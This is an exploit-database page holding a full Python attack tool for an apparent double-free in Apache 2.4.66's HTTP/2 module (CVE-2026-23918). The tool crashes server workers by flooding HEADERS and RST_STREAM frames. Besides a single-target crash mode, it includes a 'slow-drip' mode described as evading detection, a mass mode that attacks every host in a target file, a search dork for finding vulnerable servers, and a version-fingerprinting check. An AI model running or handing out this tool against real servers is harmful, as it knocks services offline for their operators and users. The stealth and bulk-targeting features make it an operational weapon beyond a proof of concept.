Lucene search
K

📄 Apache HTTP Server 2.4.66 Denial of Service

🗓️ 29 May 2026 00:00:00Reported by xeloxaType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 22 Views

CVE-2026-23918: Apache HTTP Server 2.4.66 mod_http2 double-free DoS via rapid HEADERS and RST_STREAM.

Related
Code
# Exploit Title: Apache HTTP Server 2.4.66 - 'mod_http2' Double-Free Denial of Service
    # Google Dork: intext:"Apache/2.4.66" "HTTP/2"
    # Date: 2026-05-06
    # Exploit Author: xeloxa (https://github.com/xeloxa/) <[email protected]>
    # Vendor Homepage: https://httpd.apache.org/
    # Software Link: https://archive.apache.org/dist/httpd/httpd-2.4.66.tar.gz
    # Version: 2.4.66
    # Tested on: Debian / Ubuntu
    # CVE : CVE-2026-23918
    
    """
    CVE-2026-23918 - Apache mod_http2 Double-Free PoC
    
    Quick summary: This bug (CWE-415) hits Apache 2.4.66. It's a race condition
    in the stream cleanup path. If you spam HEADERS and RST_STREAM fast enough,
    you can trigger a double-free and crash the worker.
    
    Author: xeloxa (https://github.com/xeloxa/) <[email protected]>
    Found by: Bartlomiej Dmitruk & Stanislaw Strzalkowski
    """
    
    import argparse
    import json
    import os
    import signal
    import socket
    import ssl
    import sys
    import threading
    import time
    from collections import defaultdict
    from dataclasses import dataclass, field
    from datetime import datetime
    from typing import Dict, List, Optional, Tuple
    
    # ---------------------------------------------------------------------------
    # Dependency Check
    # ---------------------------------------------------------------------------
    try:
        import h2.config
        import h2.connection
        import h2.events
    
        HAS_H2 = True
    except ImportError:
        HAS_H2 = False
    
    
    # ---------------------------------------------------------------------------
    # ANSI Colors (for terminal output)
    # ---------------------------------------------------------------------------
    class Color:
        RED = "\033[91m"
        GREEN = "\033[92m"
        YELLOW = "\033[93m"
        BLUE = "\033[94m"
        MAGENTA = "\033[95m"
        CYAN = "\033[96m"
        BOLD = "\033[1m"
        RESET = "\033[0m"
    
    
    def c(text: str, color: str) -> str:
        """Wrap text in color if output is a terminal."""
        if sys.stdout.isatty():
            return f"{color}{text}{Color.RESET}"
        return text
    
    
    def print_banner(title: str, color: str = Color.BOLD) -> None:
        """Print a consistent tool banner with author info."""
        print(f"{'=' * 60}")
        print(c(title, color))
        print(f"Author: xeloxa (https://github.com/xeloxa/)")
        print(f"{'=' * 60}")
    
    
    # ---------------------------------------------------------------------------
    # Data Structures
    # ---------------------------------------------------------------------------
    @dataclass
    class ExploitStats:
        """Just a thread-safe counter for the stats."""
    
        connections: int = 0
        requests: int = 0
        resets: int = 0
        conn_errors: int = 0
        stream_errors: int = 0
        crashes: int = 0
        lock: threading.Lock = field(default_factory=threading.Lock)
    
        def inc(self, attr: str, delta: int = 1) -> None:
            with self.lock:
                setattr(self, attr, getattr(self, attr) + delta)
    
        def snapshot(self) -> Dict[str, int]:
            with self.lock:
                return {
                    "connections": self.connections,
                    "requests": self.requests,
                    "resets": self.resets,
                    "conn_errors": self.conn_errors,
                    "stream_errors": self.stream_errors,
                    "crashes": self.crashes,
                }
    
    
    # ---------------------------------------------------------------------------
    # SSL / HTTP/2 Connection Helpers
    # ---------------------------------------------------------------------------
    def create_ssl_context(
        alpn_protocols: Optional[List[str]] = None,
    ) -> ssl.SSLContext:
        """Create an SSL context configured for HTTP/2 ALPN negotiation."""
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        if alpn_protocols is None:
            alpn_protocols = ["h2"]
        ctx.set_alpn_protocols(alpn_protocols)
        return ctx
    
    
    def establish_h2_connection(
        host: str,
        port: int,
        timeout: float = 5.0,
        use_ssl: bool = True,
    ) -> Tuple[Optional[socket.socket], Optional[h2.connection.H2Connection]]:
        """
        Sets up an H2 connection. 
        Returns (socket, h2_connection) or (None, None) if something breaks.
        """
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            sock.connect((host, port))
    
            if use_ssl:
                ctx = create_ssl_context()
                sock = ctx.wrap_socket(sock, server_hostname=host)
    
            config = h2.config.H2Configuration(client_side=True)
            conn = h2.connection.H2Connection(config=config)
            conn.initiate_connection()
            sock.sendall(conn.data_to_send())
    
            # Receive server preface (SETTINGS frame)
            data = sock.recv(8192)
            if not data:
                sock.close()
                return None, None
            conn.receive_data(data)
            sock.sendall(conn.data_to_send())
    
            return sock, conn
        except Exception:
            try:
                sock.close()
            except Exception:
                pass
            return None, None
    
    
    # ---------------------------------------------------------------------------
    # Mode 1: DoS - Rapid RST Attack
    # ---------------------------------------------------------------------------
    class RapidRSTDoS:
        """
        The "classic" Rapid-RST DoS.
        
        We send a HEADERS frame and immediately follow up with an RST_STREAM. 
        If the server hasn't registered the stream yet, it'll trigger two 
        different cleanup callbacks. Both try to free the same memory. 
        Boom - SIGSEGV.
        """
    
        def __init__(
            self,
            target: str,
            port: int,
            workers: int = 100,
            intensity: int = 7,
            use_ssl: bool = True,
            timeout: float = 5.0,
            verbose: bool = False,
            json_output: bool = False,
        ):
            self.target = target
            self.port = port
            self.num_workers = workers
            self.intensity = max(1, min(10, intensity))
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.verbose = verbose
            self.json_output = json_output
    
            self.running = True
            self.crashed = False
            self.stats = ExploitStats()
            self.start_time: Optional[float] = None
    
        def is_server_alive(self) -> bool:
            """Check if the target server is responsive via HTTP/2."""
            sock, conn = establish_h2_connection(
                self.target, self.port, timeout=3.0, use_ssl=self.use_ssl
            )
            if sock is None:
                return False
            try:
                sock.close()
            except Exception:
                pass
            return True
    
        def worker(self, worker_id: int) -> None:
            """
            Worker thread that continuously opens HTTP/2 connections and sends
            HEADERS+RST_STREAM frame sequences to trigger the double-free.
            """
            streams_per_conn = 50
            reset_interval = max(1, 11 - self.intensity)  # Lower = more resets
    
            while self.running:
                sock, conn = establish_h2_connection(
                    self.target,
                    self.port,
                    timeout=self.timeout,
                    use_ssl=self.use_ssl,
                )
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.1)
                    continue
    
                self.stats.inc("connections")
    
                try:
                    sent = 0
                    while sent < streams_per_conn and self.running:
                        try:
                            stream_id = conn.get_next_available_stream_id()
                            conn.send_headers(
                                stream_id,
                                [
                                    (b":method", b"GET"),
                                    (b":scheme", b"https" if self.use_ssl else b"http"),
                                    (b":authority", self.target.encode()),
                                    (b":path", b"/"),
                                ],
                            )
                            sock.sendall(conn.data_to_send())
                            self.stats.inc("requests")
    
                            # Send RST_STREAM on configured interval
                            if sent % reset_interval == 0:
                                conn.reset_stream(stream_id, error_code=1)
                                sock.sendall(conn.data_to_send())
                                self.stats.inc("resets")
    
                            sent += 1
                            # Small delay to avoid overwhelming local resources
                            time.sleep(0.001 * (11 - self.intensity))
    
                        except Exception:
                            self.stats.inc("stream_errors")
                            break
    
                    # Gracefully close the connection
                    conn.close_connection()
                    try:
                        sock.sendall(conn.data_to_send())
                    except Exception:
                        pass
    
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
        def monitor(self) -> None:
            """Monitor thread that checks server aliveness and prints stats."""
            checks_since_alive = 0
            last_report = 0
    
            while self.running:
                time.sleep(0.5)
                alive = self.is_server_alive()
    
                if alive:
                    checks_since_alive = 0
                    elapsed = int(time.time() - self.start_time)
                    if elapsed - last_report >= 10:
                        last_report = elapsed
                        snap = self.stats.snapshot()
                        if self.json_output:
                            print(
                                json.dumps(
                                    {
                                        "timestamp": datetime.now().isoformat(),
                                        "elapsed_s": elapsed,
                                        "status": "alive",
                                        **snap,
                                    }
                                )
                            )
                        else:
                            print(
                                f" {c(f'[t={elapsed}s]', Color.CYAN)} "
                                f"conns={snap['connections']} "
                                f"reqs={snap['requests']} "
                                f"resets={snap['resets']} "
                                f"{c('OK', Color.GREEN)}"
                            )
                else:
                    checks_since_alive += 1
                    if checks_since_alive >= 2 and not self.crashed:
                        self.crashed = True
                        self.stats.inc("crashes")
                        elapsed = int(time.time() - self.start_time)
                        if self.json_output:
                            print(
                                json.dumps(
                                    {
                                        "timestamp": datetime.now().isoformat(),
                                        "elapsed_s": elapsed,
                                        "status": "CRASHED",
                                        **self.stats.snapshot(),
                                    }
                                )
                            )
                        else:
                            print(f"\n{'=' * 60}")
                            print(
                                c(
                                    f"!!! SERVER CRASHED at t={elapsed}s !!!",
                                    Color.RED + Color.BOLD,
                                )
                            )
                            print(
                                f"Stats: {json.dumps(self.stats.snapshot(), indent=2)}"
                            )
                            print(f"{'=' * 60}")
                        self.running = False
                        return
    
        def run(self) -> None:
            """Execute the DoS exploit."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Apache Double-Free DoS", Color.BOLD + Color.RED)
                print(f"Target: {self.target}:{self.port}")
                print(f"Mode  : Rapid-RST")
                print(f"Stats : {self.num_workers} workers | Intensity {self.intensity}")
                print(f"SSL   : {'On' if self.use_ssl else 'Off'}")
                print(f"{'=' * 60}")
    
            if not HAS_H2:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
                sys.exit(1)
    
            # Pre-flight server check
            if not self.json_output:
                print(c("[*] Checking if server is up...", Color.YELLOW))
            if not self.is_server_alive():
                print(c(f"[!] Can't reach {self.target}:{self.port}", Color.RED))
                sys.exit(1)
            if not self.json_output:
                print(c("[+] Server's up. Sending payloads...\n", Color.GREEN))
    
            # Launch workers
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
    
            # Run monitor (blocks until crash detected or Ctrl+C)
            self.monitor()
    
            # Wait for workers to finish
            for t in workers:
                t.join(timeout=2)
    
            # Final report
            snap = self.stats.snapshot()
            if self.json_output:
                print(
                    json.dumps(
                        {
                            "timestamp": datetime.now().isoformat(),
                            "final": True,
                            "crashed": self.crashed,
                            **snap,
                        }
                    )
                )
            else:
                print(f"\n{'=' * 60}")
                print(c("ATTACK RESULTS", Color.BOLD))
                print(f"{'=' * 60}")
                print(f"Connections: {snap['connections']}")
                print(f"Requests   : {snap['requests']}")
                print(f"Resets     : {snap['resets']}")
                print(f"Errors     : {snap['conn_errors']} (conn) / {snap['stream_errors']} (stream)")
                if self.crashed:
                    print(c("\n[!] CRASH DETECTED - Double-free confirmed.", Color.RED + Color.BOLD))
                else:
                    print(c("\n[-] Server's still alive.", Color.YELLOW))
                print(f"{'=' * 60}")
    
    
    # ---------------------------------------------------------------------------
    # Mode 2: Slow-Drip DoS (Stealth)
    # ---------------------------------------------------------------------------
    class SlowDripDoS:
        """
        Low-bandwidth, sustained denial of service.
    
        Uses fewer connections and longer intervals between RST_STREAM frames
        to evade detection while maintaining pressure on the target.
        """
    
        def __init__(
            self,
            target: str,
            port: int,
            workers: int = 5,
            intensity: int = 3,
            duration_minutes: int = 30,
            use_ssl: bool = True,
            timeout: float = 5.0,
            json_output: bool = False,
        ):
            self.target = target
            self.port = port
            self.num_workers = max(1, workers)
            self.intensity = max(1, min(5, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.json_output = json_output
    
            self.running = True
            self.stats = ExploitStats()
            self.start_time: Optional[float] = None
    
        def worker(self, worker_id: int) -> None:
            """Slow-drip worker - lower frequency, sustained attack."""
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                sock, conn = establish_h2_connection(
                    self.target, self.port, timeout=self.timeout, use_ssl=self.use_ssl
                )
                if sock is None:
                    self.stats.inc("conn_errors")
                    time.sleep(0.5)
                    continue
    
                self.stats.inc("connections")
                try:
                    stream_id = conn.get_next_available_stream_id()
                    conn.send_headers(
                        stream_id,
                        [
                            (b":method", b"GET"),
                            (b":scheme", b"https" if self.use_ssl else b"http"),
                            (b":authority", self.target.encode()),
                            (b":path", b"/"),
                        ],
                    )
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("requests")
    
                    # Small delay before reset - simulates slow client
                    time.sleep(0.01)
                    conn.reset_stream(stream_id, error_code=1)
                    sock.sendall(conn.data_to_send())
                    self.stats.inc("resets")
    
                    conn.close_connection()
                    sock.sendall(conn.data_to_send())
                except Exception:
                    self.stats.inc("stream_errors")
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
                # Longer sleep for stealth
                delay = max(1.0, (6 - self.intensity) * 2.0)
                time.sleep(delay)
    
        def run(self) -> None:
            """Execute the slow-drip DoS."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Slow-Drip (Stealth)", Color.BOLD + Color.YELLOW)
                print(f"Target: {self.target}:{self.port}")
                print(f"Time  : {self.duration_seconds // 60} min")
                print(f"Workers: {self.num_workers} | Intensity: {self.intensity}")
                print(f"{'=' * 60}")
    
            if not HAS_H2:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
                sys.exit(1)
    
            self.start_time = time.time()
            workers = []
            for i in range(self.num_workers):
                t = threading.Thread(target=self.worker, args=(i,), daemon=True)
                t.start()
                workers.append(t)
    
            # Wait for duration or Ctrl+C
            try:
                while self.running and (
                    time.time() - self.start_time < self.duration_seconds
                ):
                    time.sleep(5)
                    elapsed = int(time.time() - self.start_time)
                    snap = self.stats.snapshot()
                    if self.json_output:
                        print(
                            json.dumps(
                                {
                                    "timestamp": datetime.now().isoformat(),
                                    "elapsed_s": elapsed,
                                    **snap,
                                }
                            )
                        )
                    else:
                        remaining = self.duration_seconds - elapsed
                        print(
                            f" {c(f'[{elapsed}s/{remaining}s remaining]', Color.CYAN)} "
                            f"conns={snap['connections']} "
                            f"resets={snap['resets']}"
                        )
            except KeyboardInterrupt:
                pass
    
            self.running = False
            for t in workers:
                t.join(timeout=2)
    
            if not self.json_output:
                print(c("\n[*] Slow-drip attack complete.", Color.GREEN))
    
    
    # ---------------------------------------------------------------------------
    # Mode 3: Mass DoS
    # ---------------------------------------------------------------------------
    class MassDoS:
        """Multi-target sustained denial of service."""
    
        def __init__(
            self,
            targets_file: str,
            workers_per_target: int = 50,
            intensity: int = 7,
            duration_minutes: int = 30,
            use_ssl: bool = True,
            timeout: float = 5.0,
            json_output: bool = False,
        ):
            self.targets = self._load_targets(targets_file)
            self.workers_per_target = workers_per_target
            self.intensity = max(1, min(10, intensity))
            self.duration_seconds = duration_minutes * 60
            self.use_ssl = use_ssl
            self.timeout = timeout
            self.json_output = json_output
    
            self.running = True
            self.start_time: Optional[float] = None
            self.target_results: Dict[Tuple[str, int], Dict] = defaultdict(
                lambda: {
                    "status": "unknown",
                    "connections": 0,
                    "conn_errors": 0,
                    "requests": 0,
                    "resets": 0,
                    "crashes": 0,
                }
            )
            self.results_lock = threading.Lock()
    
        @staticmethod
        def _load_targets(path: str) -> List[Tuple[str, int]]:
            """Load targets from file (format: host:port or host)."""
            targets = []
            with open(path) as f:
                for line in f:
                    line = line.strip()
                    if not line or line.startswith("#"):
                        continue
                    if ":" in line:
                        host, port = line.rsplit(":", 1)
                        targets.append((host.strip(), int(port.strip())))
                    else:
                        targets.append((line.strip(), 443))
            return targets
    
        def is_alive(self, host: str, port: int) -> bool:
            """Quick aliveness check."""
            sock, conn = establish_h2_connection(
                host, port, timeout=3.0, use_ssl=self.use_ssl
            )
            if sock is None:
                return False
            try:
                sock.close()
            except Exception:
                pass
            return True
    
        def worker(self, host: str, port: int) -> None:
            """Attack worker for a specific target."""
            results = self.target_results[(host, port)]
            reset_interval = max(1, 11 - self.intensity)
            sent = 0
    
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                sock, conn = establish_h2_connection(
                    host, port, timeout=self.timeout, use_ssl=self.use_ssl
                )
                if sock is None:
                    with self.results_lock:
                        results["conn_errors"] += 1
                    time.sleep(0.5)
                    continue
    
                with self.results_lock:
                    results["connections"] += 1
    
                try:
                    while self.running and (
                        time.time() - self.start_time < self.duration_seconds
                    ):
                        try:
                            sid = conn.get_next_available_stream_id()
                            conn.send_headers(
                                sid,
                                [
                                    (b":method", b"GET"),
                                    (
                                        b":scheme",
                                        b"https" if self.use_ssl else b"http",
                                    ),
                                    (b":authority", host.encode()),
                                    (b":path", b"/"),
                                ],
                            )
                            sock.sendall(conn.data_to_send())
                            with self.results_lock:
                                results["requests"] += 1
                            sent += 1
    
                            if sent % reset_interval == 0:
                                conn.reset_stream(sid, error_code=1)
                                sock.sendall(conn.data_to_send())
                                with self.results_lock:
                                    results["resets"] += 1
                        except Exception:
                            break
    
                    conn.close_connection()
                    try:
                        sock.sendall(conn.data_to_send())
                    except Exception:
                        pass
                except Exception:
                    pass
                finally:
                    try:
                        sock.close()
                    except Exception:
                        pass
    
        def monitor_target(self, host: str, port: int) -> None:
            """Monitor aliveness for a specific target."""
            results = self.target_results[(host, port)]
            while self.running and (
                time.time() - self.start_time < self.duration_seconds
            ):
                alive = self.is_alive(host, port)
                with self.results_lock:
                    if not alive:
                        if results["status"] != "down":
                            results["status"] = "down"
                            results["crashes"] += 1
                            elapsed = int(time.time() - self.start_time)
                            if not self.json_output:
                                print(
                                    c(
                                        f" [t={elapsed}s] {host}:{port} - SERVER DOWN",
                                        Color.RED,
                                    )
                                )
                    else:
                        results["status"] = "up"
                time.sleep(5)
    
        def print_dashboard(self) -> None:
            """Print live status dashboard."""
            print("\033[2J\033[H", end="")  # ANSI escape sequence to clear screen
            elapsed = int(time.time() - self.start_time)
            remaining = max(0, self.duration_seconds - elapsed)
            print(f"{'=' * 70}")
            print(f" CVE-2026-23918 Mass DoS | {elapsed}s elapsed | {remaining}s remaining")
            print(f"{'=' * 70}")
            print(
                f"{'Target':<35} {'Status':<10} {'Conns':<8} {'Err':<5} {'Reqs':<8} {'Resets':<8} {'Crashes':<8}"
            )
            print("-" * 80)
            for host, port in self.targets:
                r = self.target_results[(host, port)]
                print(
                    f"{host+':'+str(port):<35} "
                    f"{r['status']:<10} {r['connections']:<8} {r['conn_errors']:<5} "
                    f"{r['requests']:<8} {r['resets']:<8} {r['crashes']:<8}"
                )
            print(f"{'=' * 70}")
    
        def run(self) -> None:
            """Execute mass DoS attack."""
            if not self.json_output:
                print_banner("CVE-2026-23918 - Mass Scan/Attack", Color.BOLD + Color.RED)
                print(f"Targets: {len(self.targets)} | Time: {self.duration_seconds // 60} min")
                print(f"Workers: {self.workers_per_target} per target | Intensity: {self.intensity}")
                print(f"{'=' * 60}\n")
    
            if not HAS_H2:
                print(c("[!] h2 library missing: pip3 install h2", Color.RED))
                sys.exit(1)
    
            self.start_time = time.time()
    
            # Launch workers for each target
            all_workers = []
            for host, port in self.targets:
                for _ in range(self.workers_per_target):
                    t = threading.Thread(
                        target=self.worker, args=(host, port), daemon=True
                    )
                    t.start()
                    all_workers.append(t)
    
                # Launch a monitor for each target
                mt = threading.Thread(
                    target=self.monitor_target, args=(host, port), daemon=True
                )
                mt.start()
                all_workers.append(mt)
    
            # Dashboard loop
            try:
                while self.running and (
                    time.time() - self.start_time < self.duration_seconds
                ):
                    if not self.json_output:
                        self.print_dashboard()
                    time.sleep(10)
            except KeyboardInterrupt:
                pass
    
            self.running = False
            for t in all_workers:
                t.join(timeout=2)
    
            if not self.json_output:
                self.print_dashboard()
                print(c("\n[*] Mass DoS complete.", Color.GREEN))
    
    
    # ---------------------------------------------------------------------------
    # Mode 4: RCE Detection (Passive)
    # ---------------------------------------------------------------------------
    def rce_detect(
        target: str, port: int, timeout: float = 5.0, json_output: bool = False
    ) -> Dict:
        """
        Passive check: fingerprint the target and report whether
        CVE-2026-23918 may apply. No exploit payloads are sent.

        One HTTP/2 connection is opened (always with ``use_ssl=True``), a
        single ``GET /`` is issued, and the ``Server`` response header is
        inspected for an Apache version.

        Args:
            target: Host name or IP; also sent as the ``:authority`` value.
            port: TCP port to connect to.
            timeout: Passed to ``establish_h2_connection`` and used as the
                upper bound (seconds) on waiting for the response headers.
            json_output: Print the result as JSON instead of the text report.

        Returns:
            The result dict (``target``, ``timestamp``, ``reachable``,
            ``http2_supported``, ``server_header``, ``apache_version``,
            ``likely_vulnerable``, ``cve_applicable``, ``notes``), or
            ``{"error": ...}`` when the h2 library is not installed.
        """
        if not HAS_H2:
            if json_output:
                print(
                    json.dumps(
                        {"error": "h2 library not installed. Run: pip3 install h2"}
                    )
                )
            else:
                print(c("[!] h2 library missing. Install: pip3 install h2", Color.RED))
            return {"error": "h2 library not installed"}

        result = {
            "target": f"{target}:{port}",
            "timestamp": datetime.now().isoformat(),
            "reachable": False,
            "http2_supported": False,
            "server_header": None,
            "apache_version": None,
            "likely_vulnerable": False,
            "cve_applicable": False,
            "notes": [],
        }

        # Try HTTP/2 connection
        sock, conn = establish_h2_connection(target, port, timeout=timeout, use_ssl=True)
        if sock is None:
            result["notes"].append("Target not reachable or HTTP/2 not supported")
            # Report the negative result as well; previously this path
            # returned without printing anything in either output mode.
            _print_detection_report(result, json_output, conclusive=False)
            return result

        result["reachable"] = True
        result["http2_supported"] = True

        try:
            result["server_header"] = _fetch_server_header(sock, conn, target, timeout)
        except Exception as e:
            # Best-effort probe: record the failure and still emit a report.
            result["notes"].append(f"Error during detection: {e}")
        finally:
            try:
                sock.close()
            except Exception:
                pass  # closing is best-effort; the probe result is unaffected

        if result["server_header"]:
            result["apache_version"] = _extract_apache_version(result["server_header"])

        conclusive = False
        if result["apache_version"]:
            conclusive = _assess_apache_version(result["apache_version"], result)
        else:
            result["notes"].append(
                "HTTP/2 supported but version unknown - manual verification needed"
            )
            result["cve_applicable"] = True  # Potentially vulnerable

        _print_detection_report(result, json_output, conclusive)
        return result


    def _fetch_server_header(sock, conn, target: str, timeout: float) -> Optional[str]:
        """Send one ``GET /`` on *conn* and return the ``Server`` header value, if any."""
        stream_id = conn.get_next_available_stream_id()
        conn.send_headers(
            stream_id,
            [
                (b":method", b"GET"),
                (b":scheme", b"https"),
                (b":authority", target.encode()),
                (b":path", b"/"),
            ],
        )
        conn.end_stream(stream_id)
        sock.sendall(conn.data_to_send())

        # The first bytes from the server are commonly just its SETTINGS frame,
        # so keep reading until the response headers arrive, the peer gives up,
        # or the time budget is exhausted.
        terminal_events = (h2.events.StreamReset, h2.events.ConnectionTerminated)
        deadline = time.monotonic() + timeout
        while time.monotonic() < deadline:
            data = sock.recv(8192)
            if not data:
                return None  # peer closed the connection
            events = conn.receive_data(data)
            # Flush whatever h2 queued in reaction (e.g. SETTINGS acknowledgement).
            pending = conn.data_to_send()
            if pending:
                sock.sendall(pending)
            for event in events:
                if isinstance(event, h2.events.ResponseReceived):
                    for name, value in event.headers:
                        header_name = name.decode("utf-8", errors="replace").lower()
                        if header_name == "server":
                            return value.decode("utf-8", errors="replace")
                    return None  # response carried no Server header
                if isinstance(event, terminal_events):
                    return None
        return None


    def _extract_apache_version(server_header: str) -> Optional[str]:
        """Return the version from the ``Apache/<version>`` product token, or None."""
        # Only the Apache token is considered, so trailing products such as
        # "OpenSSL/3.0.11" are no longer mistaken for the Apache version.
        for token in server_header.split():
            product, slash, version = token.partition("/")
            if slash and version and product.lower() == "apache":
                return version
        return None


    def _assess_apache_version(version: str, result: Dict) -> bool:
        """Update flags/notes in *result* for *version*; return True if conclusive."""
        affected = (2, 4, 66)  # affected release per the CVE record
        try:
            numeric = tuple(int(part) for part in version.split(".")[:3])
        except ValueError:
            result["notes"].append("Could not parse version string")
            return False

        if numeric == affected:
            result["likely_vulnerable"] = True
            result["cve_applicable"] = True
            result["notes"].append(
                f"Apache {version} detected - VULNERABLE to CVE-2026-23918"
            )
            return True

        if numeric == affected[: len(numeric)]:
            # Truncated banner ("2.4" or "2"): the affected release cannot be
            # ruled in or out from this alone.
            result["cve_applicable"] = True
            result["notes"].append(
                f"Apache {version} - version too coarse to compare, "
                "manual verification needed"
            )
            return False

        if numeric > affected:
            result["notes"].append(f"Apache {version} - PATCHED (>= 2.4.67)")
        else:
            result["notes"].append(
                f"Apache {version} - outside confirmed CVE range (< 2.4.66)"
            )
        return True


    def _print_detection_report(result: Dict, json_output: bool, conclusive: bool) -> None:
        """Print *result* as JSON, or as the human-readable scan report."""
        if json_output:
            print(json.dumps(result, indent=2))
            return

        print_banner("Vulnerability Scan Report", Color.BOLD)
        print(f"Target : {result['target']}")
        print(f"H2     : {'Supported' if result['http2_supported'] else 'Not found'}")
        print(f"Server : {result['server_header'] or 'Unknown'}")
        print(f"Apache : {result['apache_version'] or 'Unknown'}")

        if result["likely_vulnerable"]:
            status = c("LIKELY VULNERABLE", Color.RED + Color.BOLD)
        elif conclusive:
            status = c("Likely safe", Color.GREEN)
        else:
            # Do not claim "safe" when the version could not be determined.
            status = c("UNKNOWN - manual verification needed", Color.YELLOW)
        print(f"Status : {status}")

        if result["notes"]:
            print("Notes  :")
            for note in result["notes"]:
                print(f"  - {note}")
        print(f"{'=' * 60}")
    
    
    # ---------------------------------------------------------------------------
    # Signal Handling
    # ---------------------------------------------------------------------------
    def signal_handler(sig: int, frame) -> None:
        """Print a shutdown notice and end the process with exit status 0.

        Both arguments are supplied by the ``signal`` machinery and are unused.
        """
        notice = c("\n[!] Received interrupt - shutting down...", Color.YELLOW)
        print(notice)
        # Same effect as sys.exit(0): unwinds the main thread via SystemExit.
        raise SystemExit(0)
    
    
    # ---------------------------------------------------------------------------
    # Main Entry Point
    # ---------------------------------------------------------------------------
    def main() -> None:
        """
        Command-line entry point: parse arguments, validate them, install the
        signal handlers and dispatch to the selected mode.

        Invalid or missing arguments are rejected through ``parser.error``
        (usage message on stderr, exit status 2). An exception raised by a
        mode is reported as a fatal error with exit status 1.
        """
        parser = argparse.ArgumentParser(
            description="CVE-2026-23918 - Apache HTTP/2 Double-Free Exploit",
            formatter_class=argparse.RawDescriptionHelpFormatter,
            epilog="""
    Examples:
      %(prog)s --target 192.168.1.100 --port 8443 --mode dos
      %(prog)s --target example.com --mode rce-detect
      %(prog)s --targets targets.txt --mode mass --duration 30
      %(prog)s --target 10.0.0.50 --mode slow-drip -w 5 -i 3 -d 60
            """,
        )

        parser.add_argument(
            "--target", "-t", help="Target IP or hostname"
        )
        parser.add_argument(
            "--port", "-p", type=int, default=443, help="Target port (default: 443)"
        )
        parser.add_argument(
            "--mode",
            "-m",
            choices=["dos", "slow-drip", "mass", "rce-detect"],
            default="dos",
            help="Exploit mode (default: dos)",
        )
        parser.add_argument(
            "--targets",
            "-T",
            help="File with target list for mass mode (format: host:port per line)",
        )
        parser.add_argument(
            "--workers",
            "-w",
            type=int,
            default=100,
            help="Number of concurrent worker threads (default: 100)",
        )
        parser.add_argument(
            "--intensity",
            "-i",
            type=int,
            default=7,
            help="Attack intensity 1-10 (default: 7)",
        )
        parser.add_argument(
            "--duration",
            "-d",
            type=int,
            default=30,
            help="Attack duration in minutes for slow-drip/mass modes (default: 30)",
        )
        parser.add_argument(
            "--timeout",
            type=float,
            default=5.0,
            help="Connection timeout in seconds (default: 5)",
        )
        parser.add_argument(
            "--no-ssl",
            action="store_true",
            help="Use plaintext HTTP/2 (h2c) instead of HTTPS (h2)",
        )
        parser.add_argument(
            "--verbose", "-v", action="store_true", help="Verbose output"
        )
        parser.add_argument(
            "--json", action="store_true", dest="json_output", help="JSON output format"
        )

        args = parser.parse_args()

        # Validate arguments
        if args.mode in ("dos", "slow-drip", "rce-detect") and not args.target:
            parser.error(f"--target is required for mode '{args.mode}'")
        if args.mode == "mass" and not args.targets:
            parser.error("--targets file is required for mass mode")

        # Range checks: reject values the help text rules out (or that cannot
        # be valid at all) up front instead of failing somewhere inside a mode.
        if not 1 <= args.port <= 65535:
            parser.error("--port must be between 1 and 65535")
        if args.workers < 1:
            parser.error("--workers must be at least 1")
        if not 1 <= args.intensity <= 10:
            parser.error("--intensity must be between 1 and 10")
        if args.duration < 1:
            parser.error("--duration must be at least 1 minute")
        if args.timeout <= 0:
            parser.error("--timeout must be greater than 0")

        use_ssl = not args.no_ssl

        # rce_detect is called without any SSL option, so say so rather than
        # silently ignoring the flag. stderr keeps --json output clean.
        if args.mode == "rce-detect" and args.no_ssl:
            print(
                "[!] --no-ssl is ignored in rce-detect mode",
                file=sys.stderr,
            )

        # Register signal handlers for clean exit
        signal.signal(signal.SIGINT, signal_handler)
        signal.signal(signal.SIGTERM, signal_handler)

        # Dispatch to selected mode
        try:
            if args.mode == "dos":
                exploit = RapidRSTDoS(
                    target=args.target,
                    port=args.port,
                    workers=args.workers,
                    intensity=args.intensity,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    verbose=args.verbose,
                    json_output=args.json_output,
                )
                exploit.run()

            elif args.mode == "slow-drip":
                exploit = SlowDripDoS(
                    target=args.target,
                    port=args.port,
                    workers=args.workers,
                    intensity=args.intensity,
                    duration_minutes=args.duration,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )
                exploit.run()

            elif args.mode == "mass":
                exploit = MassDoS(
                    targets_file=args.targets,
                    workers_per_target=args.workers,
                    intensity=args.intensity,
                    duration_minutes=args.duration,
                    use_ssl=use_ssl,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )
                exploit.run()

            elif args.mode == "rce-detect":
                rce_detect(
                    target=args.target,
                    port=args.port,
                    timeout=args.timeout,
                    json_output=args.json_output,
                )

        except KeyboardInterrupt:
            print(c("\n[!] Interrupted by user.", Color.YELLOW))
            sys.exit(0)
        except Exception as e:
            # Top-level boundary: report any failure from a mode and exit non-zero.
            print(c(f"\n[!] Fatal error: {e}", Color.RED))
            sys.exit(1)
    
    
    if __name__ == "__main__":
        main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

API

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

